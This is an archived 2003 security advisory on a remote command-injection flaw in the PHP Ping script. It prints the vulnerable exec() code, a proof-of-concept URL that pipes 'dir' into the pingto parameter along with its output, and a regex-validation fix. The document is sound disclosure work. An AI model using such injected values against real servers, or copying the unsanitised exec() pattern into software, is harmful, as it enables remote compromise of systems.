SCSA009.txt

2003-03-07T00:00:00
ID PACKETSTORM:30883
Type packetstorm
Reporter Gregory Le Bras
Modified 2003-03-07T00:00:00

Description

                                        
                                            `________________________________________________________________________  
  
Security Corporation Security Advisory [SCSA-009]  
________________________________________________________________________  
  
PROGRAM: PHP Ping  
HOMEPAGE: http://www.phpapps.org/  
VULNERABLE VERSIONS: v0.1 and prior  
________________________________________________________________________  
  
DESCRIPTION  
________________________________________________________________________  
  
PHP ping "will allow you, provided that your server turns under Windows,  
to realize a "ping" on the host of your choice."  
  
(direct quote from PHP Ping website)  
  
  
DETAILS  
________________________________________________________________________  
  
A vulnerability have been found in PHP ping which allow attackers to  
execute remote command.  
  
This vulnerability would allow a remote attacker to compromise parts of  
the operating system, possibly the complete operating system.  
  
Vulnerable code :  
  
<?  
//*************************************  
// FONCTION DU PING  
//*************************************  
function PHPing($cible,$pingFile){  
exec("ping -a -n 1 $cible >$pingFile", $list);  
$fd = fopen($pingFile, "r");  
while(!feof($fd))  
{  
$ping.= fgets($fd,256);  
}  
fclose($fd);  
return $ping;  
}  
//-------------------------------------  
?>  
  
  
EXPLOIT  
________________________________________________________________________  
  
The vulnerability was discovered in the page for execute "ping",  
at this adress :  
  
http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir  
  
This exploit simply show the contents of the current repertory.  
  
c:\phpping  
  
03/03/2003 23:01 <DIR> .  
03/03/2003 23:01 <DIR> ..  
03/03/2003 23:00 <DIR> img  
30/04/2002 23:13 3217 index.php  
30/04/2002 23:19 921 README  
03/03/2003 23:03 0 resultat.ping  
3 file(s) 4138 bytes  
3 Dir(s) 11413962752 bytes free  
  
  
SOLUTIONS  
________________________________________________________________________  
  
For example use this code :  
  
<?  
//*************************************  
// FONCTION DU PING  
//*************************************  
function PHPing($cible,$pingFile){  
  
# BugFix by Gregory LEBRAS www.security-corp.org  
  
if( (!$cible) ||  
(!preg_match("/^[\w\d\.\-]+\.[\w\d]{1,3}$/i",$cible)) ){  
echo("Error: Please specify a valid target host or IP.");  
exit;  
}  
else  
{  
exec("ping -a -n 1 $cible >$pingFile", $list);  
$fd = fopen($pingFile, "r");  
while(!feof($fd))  
{  
$ping.= fgets($fd,256);  
}  
fclose($fd);  
return $ping;  
}  
}  
//------------------------------------  
  
  
VENDOR STATUS  
________________________________________________________________________  
  
The vendor has reportedly been notified.  
  
  
LINKS  
________________________________________________________________________  
  
Version Française :  
  
http://www.security-corp.org/advisories/SCSA-009-FR.txt  
  
  
------------------------------------------------------------  
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org  
------------------------------------------------------------  
  
  
  
`